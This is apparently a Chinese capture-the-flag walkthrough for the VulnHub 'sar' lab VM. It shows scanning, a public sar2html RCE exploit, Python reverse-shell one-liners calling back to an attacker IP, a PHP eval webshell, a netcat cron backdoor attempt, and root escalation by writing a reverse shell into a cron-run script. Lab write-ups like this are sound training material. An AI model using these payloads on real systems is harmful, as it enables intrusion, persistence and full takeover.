WP：靶场sar

WP：靶场sar

靶场地址：https://www.vulnhub.com/entry/sar-1,425/#download

1、信息收集

namp -sV 192.168.2.0/24

发现只开启里一个80端口，http访问查看

尝试使用目录扫描，查看有哪些目录文件

使用kali自带的工具dirbuster，发现扫描太慢了，而且字典还不全，这里就换成dirb(或dirscan)

dirbuster

dirb http://192.168.2.105

2、收集漏洞

进入扫描结果带入到URL中查看，发现这是一个文件上传页面，尝试上传一句话木马

先尝试上传文件显示phpinfo页面，测试是否能够执行php命令，接下来使用burpsuite代理截断修改数据包

<?php phpinfo();?>

发现回显后，无法定位到文件位置。这个方法也不知道怎么利用，所有去搜一下是否有历史版本漏洞。

searchsploit sar2html 3.2.1

从漏洞名称介绍来看，存在一个远程执行代码漏洞，这里将exp拷贝到当前漏洞

3、利用漏洞

cp /usr/share/exploitdb/exploits/php/webapps/49344.py ./
python3 ./49344.py

通过分析49344.py的代码，可以看到这里需要详细指定到/sar2HTML的路径下

配置一个反弹shell

cat /etc/crontab

尝试写入定时任务

echo "*/1 * * * * root netcat 192.168.2.106 3322 -e /bin/bash" >> /etc/crontab

发现权限不够，写不进去，那就老实的尝试直接反弹吧，一口吃个胖子还是不行的

# 攻击端
nc -lvvp 3322
# 靶机
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.106",3322));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

提升shell为交互伪终端

python3 -c "import pty;pty.spawn('/bin/bash')"

写入一句话木马

command => pwd

echo "<?php eval($_POST['a']);?>" > /var/www/html/test.php

通过此目录下的phpinfo.php文件可得出，此目录解析php，但使用浏览器访问查看发现500报错

检查上传成功的代码，发现关键词被过滤了

这里就要想办法绕过过滤了

使用反弹shell的终端一样，echo始终会过滤变量

这里用了比较低级的方法绕过，直接使用vi进行编辑，虽然会有字符覆盖，但在控制好，还是能写进去的

再去网页访问看一下，已经能200正常访问了

接下来使用webshell工具连接即可

提权

虚拟终端连接上去，看一下定时任务内容，发现里面执行/var/www/html/finally.sh的文件，查找一下这个文件

发现这个文件内容是执行/var/www/html/write.sh,有点套娃啊

再看一下write.sh内容，并看一下这两个文件权限如何，是否能写入内容

通过ls -l查看后发现，我们当前可以写入到write.sh的文件内，写入一个反弹shell，这样就会以root执行。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.106",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali使用监听nc -lvvp 7777，静等反弹过来即可

再升级交互shell

python3 -c "import pty;pty.spawn('/bin/bash')"

这时就有权限拿flag了